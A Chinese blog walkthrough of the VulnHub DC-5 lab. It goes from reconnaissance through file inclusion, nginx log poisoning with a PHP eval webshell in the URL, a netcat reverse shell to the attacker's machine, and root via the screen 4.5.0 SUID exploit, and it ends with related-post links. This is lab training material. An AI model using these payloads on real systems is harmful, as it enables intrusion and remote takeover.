vulnhub靶机渗透DC-5

最新推荐文章于 2023-08-06 21:48:22 发布
最新推荐文章于 2023-08-06 21:48:22 发布
阅读量132 收藏
点赞数
分类专栏: 靶机笔记 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129616114
版权

靶机入侵——DC5

1、环境搭建

下载地址:https://www.vulnhub.com/entry/dc-5,314/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
    在这里插入图片描述
    ​ 192.168.80.134 为靶机ip,也可以使用Kali中的arp-scan 工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.134
    在这里插入图片描述
    ​ 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。

  • web端进一步信息收集

    使用wappalyzer收集信息只发现网站中间件为nginx、语言为php。无其他信息
    在这里插入图片描述

​ 使用dirsearch 对网站进行目录扫描
在这里插入图片描述

3、漏洞探测与利用

  • 通过访问扫描的目录发现,在footer.php页面刷新一次就会改变年份
    在这里插入图片描述

  • 同时thankyou.php 页面也同时存在这个现象,怀疑存在文件包含
    在这里插入图片描述

  • 尝试包含其他文件,发现确实存在文件包含漏洞
    在这里插入图片描述

  • 并且可以直接访问靶机根目录下的文件
    在这里插入图片描述

  • 前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。所以想到了通过日志文件写入小马getshell。直接访问:http://192.168.80.134/%3C?php%20@eval($_POST[%27cmd%27]);?%3E

    即可写入小马至日志文件
    在这里插入图片描述

  • 使用蚁剑连接,getshell
    在这里插入图片描述

  • 反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty; pty.spawn(“/bin/bash”)’
    在这里插入图片描述

4、权限提升

  • sudo -l 提权失败,没有可利用的命令:
    在这里插入图片描述

  • 利用find 提权:find / -perm -4000 -print 2>/dev/null
    在这里插入图片描述

  • 发现有个/bin/screen-4.5.0具有root权限,查看其是否有历史漏洞存在。使用searchsploit 功能搜索系统历史漏洞利用脚本:searchsploit screen 4.5.0
    在这里插入图片描述

  • 下载利用脚本:

    searchsploit -p 41154.txt

    cd /usr/share/exploitdb/exploits/linux/local/

    python -m SimpleHTTPServer 8888
    在这里插入图片描述

    靶机下载利用脚本:
    在这里插入图片描述

  • 也可以使用 scp远程复制文件,前提对方开启ssh服务且有ssh账号密码:

    ssh开启:修改 vim /etc/ssh/sshd_config

    将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes

    将PermitRootLogin without-password修改为PermitRootLogin yes

    启动SSH服务

    命令为:/etc/init.d/ssh start

    或者service ssh start

    远程复制命令:scp root@192.168.80.130:/home/zou/41154.sh /tmp/

    注意:靶机里面只有/tmp 目录有写权限因此,需要复制下载至此文件夹下
    在这里插入图片描述

  • 给脚本加上执行权限:chmod 777 41154.sh

  • 执行提权脚本,成功提权,获得flag
    在这里插入图片描述在这里插入图片描述

不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC系列05】DC-5靶机复盘
weixin_44681307的博客
07-09 114
利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。发现有两个可以利用的漏洞文件。
dc-5 靶机渗透学习
..
03-20 1870
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC5靶机
qq_40646572的博客
05-04 267
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
Vulnhub靶场实战———DC5
m0_67309561的博客
05-07 120
我们每次提交时,下面数字都会发现改变,我们猜测并不是一个静态数据,存在文件包含,我们测试一下。PS:此关和前面DC4一样,都是只有一个FLAG并且是通过提权的方式来获取FLAG。果然存在数据,但是这个站点不存在文件上传功能,所以尝试包含日志文件写shell。查看该用户有什么root权限命令,我们发现了一个screen的东西。已经存在了两个文件,接下来我们将其上传至靶机 tmp目录。我们发现了两个exp, 我们在kali本地编译得到。上传完成,接下来就到了最后的提取操作了。发现80端口开启,我们进入看一下。
vulnhub DC-5靶机实战
m0_51195235的博客
10-09 98
vulnhub DC-5靶机实战
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC系列5靶机实战
qq_43462485的博客
10-28 581
DC-5靶机实战 攻击机:kali 192.168.43.16 目标机:dc-5 192.168.43.251 一、信息收集 1.使用kali自带的arp-scan -l进行同网段主机发现,然后使用nmap进行端口扫描 2.发现开放80端口的web服务,溜了一圈没找到什么信息,还是参考了一下大佬的思路 发现提交contact信息后每次刷新thank you的界面下面的数值都会变化,第一次遇到这种类型 参考大佬后发现可能是LFI(本地文件包含)漏洞 3.通过burp抓包,对参数进行
Vulnhub靶机渗透测试】之DC-5(screen-4.5.0漏洞脚本提权)
Pluto.的博客
12-29 1519
文章目录Vulnhub靶机渗透测试DC-51. 信息收集2. 漏洞利用3. 提权 Vulnhub靶机渗透测试DC-5 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-5,314/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 2. 漏洞利用 3. 提权 ...
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 753
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 1988
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机DC-5(suid提权)
最新发布
过期的秋刀鱼
08-06 259
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析footer.php,有文件包含漏洞木马上传,查看日志反弹shellpython交互shell提权 find / -user root -perm /4000 2 > /dev/nulllibhax.c和rootshell.c文件的编译 run.sh bash ./run.sh 提权。
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6173
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
DC-5靶机渗透详细步骤
wwxxss
10-18 592
DC5渗透测试
Vulnhub靶场渗透测试系列DC-5(screen提权)
qq_45722813的博客
11-23 2814
Vulnhub靶场渗透测试系列DC-5 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 攻击机为kali2021,IP地址:192.168.172.131 下载好靶机导入VMware虚拟机,将网络模式设置为NAT模式,然后开启虚拟机 使用命令nmap -T4 -Pn 192.168.172.1/24进行主机发现,获取靶机的IP地址 使用命令nmap -T4 -A -p- 192.168.172.139扫描靶机的操作系统,开放端口和对应的服务使用的中间件等信息
DC-5靶机渗透测试(文件包含漏洞)
single_g_l的博客
03-26 8913
一、 环境 靶机: 192.168.1.127 攻击机:192.168.1.209 二、信息收集 1、主机发现&端口扫描 nmap -sP 192.168.1.0/24 #发现存活主机 nmap -sS A 192.168.1.127 #开放端口 2、访问80端口 3、尝试提交留言,刷新页面,“Copyright © 2017”动态变化 刷新页面,“Copyright © 2017”动态变化 4、dirsearch 扫描敏感目录 dirsearch .
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值